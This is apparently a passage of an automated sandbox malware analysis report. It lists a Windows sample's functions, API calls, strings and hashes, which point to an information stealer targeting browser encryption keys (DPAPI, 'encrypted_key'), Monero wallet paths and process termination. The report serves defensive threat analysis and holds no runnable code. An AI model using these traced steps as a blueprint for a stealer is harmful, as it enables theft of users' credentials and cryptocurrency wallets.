                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3225020163-4244082812
                                  • Opcode ID: 8e42d0abfa694bd6d4a49f6986632702047cfcdd8ba330e34ab90d993d605158
                                  • Instruction ID: 82cfe81f97a0bd6fb2e4ef113eace369bba7260c958609d000369e03bfa0b34c
                                  • Opcode Fuzzy Hash: 8e42d0abfa694bd6d4a49f6986632702047cfcdd8ba330e34ab90d993d605158
                                  • Instruction Fuzzy Hash: 88F030B5640308BBD7149BE19C8DFEB7B7CEB14715F100154FE05E2380EAB05A4897A0
                                  Function 00309DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00309E04
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00309E42
                                  • LocalAlloc.KERNEL32(00000040), ref: 00309EA7
                                    • Part of subcall function 003271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003271FE
                                  • lstrcpy.KERNEL32(00000000,00334C48), ref: 00309FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocal
                                  • String ID: @$v10$v20
                                  • API String ID: 102826412-278772428
                                  • Opcode ID: 3679fafcd1d4f2c36408fcd03ecb64df7aa4d7e647a00d8d05fdedb1eb8a530c
                                  • Instruction ID: e25a25f0f0c0d440e109a136f471697e54583fa7f41e5f82486a6150479fa78a
                                  • Opcode Fuzzy Hash: 3679fafcd1d4f2c36408fcd03ecb64df7aa4d7e647a00d8d05fdedb1eb8a530c
                                  • Instruction Fuzzy Hash: 3351DF31A12209ABCB12EF68EC95B9E77A8AF10315F154025F909EF282DB70ED558BD0
                                  Function 00305640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0030565A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00305661
                                  • InternetOpenA.WININET(0032CFEC,00000000,00000000,00000000,00000000), ref: 00305677
                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00305692
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003056BC
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 003056E1
                                  • InternetCloseHandle.WININET(?), ref: 003056FA
                                  • InternetCloseHandle.WININET(00000000), ref: 00305701
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: 1ec7a8ec705329ebba29fb57497057fdab6d724dc75888c8bb860b699b04bc70
                                  • Instruction ID: d7b417b8be201a1718535dd64616b56990d9de8b794ac4229eb5acf6ca25134f
                                  • Opcode Fuzzy Hash: 1ec7a8ec705329ebba29fb57497057fdab6d724dc75888c8bb860b699b04bc70
                                  • Instruction Fuzzy Hash: A341AC70A01609EFDB25CF54DC98BAAB7B4FF48700F1580A9E908AB3D0E7719945DF90
                                  Function 00324740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00324759
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00324769
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0032477B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0032479C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 003247AB
                                  • CloseHandle.KERNEL32(00000000), ref: 003247B2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 003247C0
                                  • CloseHandle.KERNEL32(00000000), ref: 003247CB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: eb5ad1d52b523f7eaf50c1f5c0037436949713905723790eb9c67b990eb6ddf3
                                  • Instruction ID: 8472422ce38f830ea1959f1949b32a6c7cdf079b303e30a7b3745462f6698eb2
                                  • Opcode Fuzzy Hash: eb5ad1d52b523f7eaf50c1f5c0037436949713905723790eb9c67b990eb6ddf3
                                  • Instruction Fuzzy Hash: A001B571601324ABE7265B64ACCDFEA77BCEB58751F000180F915D1290EFB08D989A60
                                  Function 003183E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00318435
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031846C
                                  • lstrlen.KERNEL32(00000000), ref: 003184B2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003184E9
                                  • lstrlen.KERNEL32(00000000), ref: 003184FF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031852E
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 0031853E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 8505da4df5013c77a024efdfa3401db857606e93bdeb4bd9770a5dd37e3e4abb
                                  • Instruction ID: 68e433ac1c0e2511b422e51d2d0be837a7b65e8a9e3298d7da9d647ae4c1ac0f
                                  • Opcode Fuzzy Hash: 8505da4df5013c77a024efdfa3401db857606e93bdeb4bd9770a5dd37e3e4abb
                                  • Instruction Fuzzy Hash: E151B0719002029FCB2ADF68D888A9BB7F9EF59300F258459EC46DB345EF30E985CB54
                                  Function 00322910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00322925
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0032292C
                                  • RegOpenKeyExA.ADVAPI32(80000002,0101B9D8,00000000,00020119,003228A9), ref: 0032294B
                                  • RegQueryValueExA.ADVAPI32(003228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00322965
                                  • RegCloseKey.ADVAPI32(003228A9), ref: 0032296F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: cfb52e80682e6691907a938a95687fd48ef7c11a8ebe21fce1b4c2c053320440
                                  • Instruction ID: 337fb0414b8bc65c4bb86db471510bf3a92bc47991dd30bb65bc1d1f08bbb0b7
                                  • Opcode Fuzzy Hash: cfb52e80682e6691907a938a95687fd48ef7c11a8ebe21fce1b4c2c053320440
                                  • Instruction Fuzzy Hash: FD01BCB5600329BBD318CBA0AC99EFB7BBCEB48711F100098FE4597340EA715A4887A0
                                  Function 00322880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00322895
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0032289C
                                    • Part of subcall function 00322910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00322925
                                    • Part of subcall function 00322910: RtlAllocateHeap.NTDLL(00000000), ref: 0032292C
                                    • Part of subcall function 00322910: RegOpenKeyExA.ADVAPI32(80000002,0101B9D8,00000000,00020119,003228A9), ref: 0032294B
                                    • Part of subcall function 00322910: RegQueryValueExA.ADVAPI32(003228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00322965
                                    • Part of subcall function 00322910: RegCloseKey.ADVAPI32(003228A9), ref: 0032296F
                                  • RegOpenKeyExA.ADVAPI32(80000002,0101B9D8,00000000,00020119,00319500), ref: 003228D1
                                  • RegQueryValueExA.ADVAPI32(00319500,0102DE50,00000000,00000000,00000000,000000FF), ref: 003228EC
                                  • RegCloseKey.ADVAPI32(00319500), ref: 003228F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 8dbcba3c654c89a9b41200f54327980e4fef8bc0a20ded420be8a39a6fe07fa5
                                  • Instruction ID: 0683bfed352affabce3e166f58c4ce5c5d899e238fbd229f5db319c1d36be755
                                  • Opcode Fuzzy Hash: 8dbcba3c654c89a9b41200f54327980e4fef8bc0a20ded420be8a39a6fe07fa5
                                  • Instruction Fuzzy Hash: 1401A2B5600318BBD7189BA4AC8DEBB777CEB54711F000154FE08D6350DAB09A4897A0
                                  Function 003071F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 0030723E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00307279
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00307280
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 003072C3
                                  • HeapFree.KERNEL32(00000000), ref: 003072CA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00307329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                  • String ID:
                                  • API String ID: 174687898-0
                                  • Opcode ID: 60e3ff3d669a50351f026594605de7ac70799ab0195ae8de164efc146c44472e
                                  • Instruction ID: ea4017df414bffcf04ea21f2360163f50755d298232fdff569c35e5eea5ee343
                                  • Opcode Fuzzy Hash: 60e3ff3d669a50351f026594605de7ac70799ab0195ae8de164efc146c44472e
                                  • Instruction Fuzzy Hash: F2414C75B067069BEB21CF69DC94BAAB3E8FB84305F1445A9EC49C7380E671F910DB90
                                  Function 0031D7B0 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0031D7D6
                                  • RegOpenKeyExA.ADVAPI32(80000001,0102D1C8,00000000,00020119,?), ref: 0031D7F5
                                  • RegQueryValueExA.ADVAPI32(?,0102DF70,00000000,00000000,00000000,000000FF), ref: 0031D819
                                  • RegCloseKey.ADVAPI32(?), ref: 0031D823
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031D848
                                  • lstrcat.KERNEL32(?,0102DFE8), ref: 0031D85C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 9ec44c372f5e8c006bed8788be3de89a521cc3e2b3e10af3ac6eec29cf40df35
                                  • Instruction ID: 40c70ca41cb28677b5543889f45e6fa91b5a3b0f4e592f383190c937d3406641
                                  • Opcode Fuzzy Hash: 9ec44c372f5e8c006bed8788be3de89a521cc3e2b3e10af3ac6eec29cf40df35
                                  • Instruction Fuzzy Hash: B341457561020CAFCB59EF68EC96BDE7775AB54304F004064B5099B391EF30AA99CF91
                                  Function 00309C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00309CA8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00309CDA
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00309D03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2746078483-738592651
                                  • Opcode ID: b37a3544bed2f59778fa344e40790802ebc53a75cb27e585bc622c70071c0bc0
                                  • Instruction ID: 52938a4d6816822d819c48446e061a6e92efa925fa6ccae6639c36bf0fc56f15
